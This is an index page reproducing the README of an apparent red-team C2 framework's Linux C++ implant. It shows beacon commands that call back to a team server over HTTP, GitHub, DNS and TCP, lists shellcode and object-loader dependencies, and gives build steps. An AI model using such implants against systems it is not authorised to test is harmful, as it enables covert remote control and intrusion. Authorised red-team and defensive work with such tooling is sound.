Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/maxdcb/c2linuximplant

Linux C++ Implant for Exploration C2
https://github.com/maxdcb/c2linuximplant

c2 commandandcontrol cybersecurity redteam

Last synced: about 1 month ago
JSON representation

Linux C++ Implant for Exploration C2

Awesome Lists containing this project

README 

          
# Exploration C2 Linux Implant



## Overview



**Exploration** is a modular Command and Control (C2) framework designed for red team operations. This repository provides the **Beacon** component implemented in C++ for targeting Linux systems. The associated TeamServer and Client components are available in the [C2TeamServer](https://github.com/maxDcb/C2TeamServer) repository.



Multiple Beacons in this project are capable of communicating with the TeamServer over various channels. Supported transport mechanisms include HTTP/HTTPS, GitHub, DNS, and TCP.



## Communication Examples



```bash

# HTTP/HTTPS

BeaconHttp   

BeaconHttp 10.10.10.10 8443 https

BeaconHttp 10.10.10.10 8080 http



# GitHub

BeaconGithub  

BeaconGithub maxDcb/C2Implant ghp_dsfgdfhdf5554456g4fdg465...



# DNS

BeaconDns  

BeaconDns 8.8.8.8 bac.superdomain.com



# TCP

BeaconTcp  

BeaconTcp 127.0.0.1 4444

```



## Build Instructions



### Submodules & External Dependencies



This project utilizes several external libraries and tools:



* [Donut](https://github.com/TheWover/donut): Generates shellcode from PE files.

* [COFFLoader](https://github.com/trustedsec/COFFLoader): Executes object files, such as those in [CS-Situational-Awareness-BOF](https://github.com/trustedsec/CS-Situational-Awareness-BOF).

* [cpp-base64](https://github.com/ReneNyffenegger/cpp-base64): Provides base64 encoding/decoding.

* [nlohmann/json](https://github.com/nlohmann/json): JSON parsing library.



### Building the Linux Beacons and Modules



Initialize submodules and prepare the build environment:



```bash

git submodule update --init

mkdir build

cd build

```



Compile:



```bash

cmake .. -DCMAKE_PROJECT_TOP_LEVEL_INCLUDES=./conan_provider.cmake



make -j4

```



Project can also be build with the C2Core package:



```

# download last linux package

url="$(curl -sH 'Accept: application/vnd.github+json' \

  ${GITHUB_TOKEN:+-H "Authorization: Bearer $GITHUB_TOKEN"} \

  'https://api.github.com/repos/maxDcb/C2Core/releases?per_page=100' \

  | jq -r '[.[] | select(.tag_name|startswith("linux-"))]

           | sort_by(.created_at) | reverse

           | .[0].assets[]

           | select(.name|test("^C2Core-Linux.*"))

           | .browser_download_url' | head -n1)"



fname="${url##*/}"

curl -L "$url" -o "$fname"

echo "Downloaded: $fname"



mkdir -p C2Core-Linux && tar -xzf C2Core-Linux.tar.gz -C C2Core-Linux



export CMAKE_PREFIX_PATH=`pwd`/C2Core-Linux



cmake .. -DCMAKE_PROJECT_TOP_LEVEL_INCLUDES=./conan_provider.cmake



make -j4

```



### Output Locations



* Compiled Beacons: `Release/Beacons`

* Compiled Modules: `Release/Modules`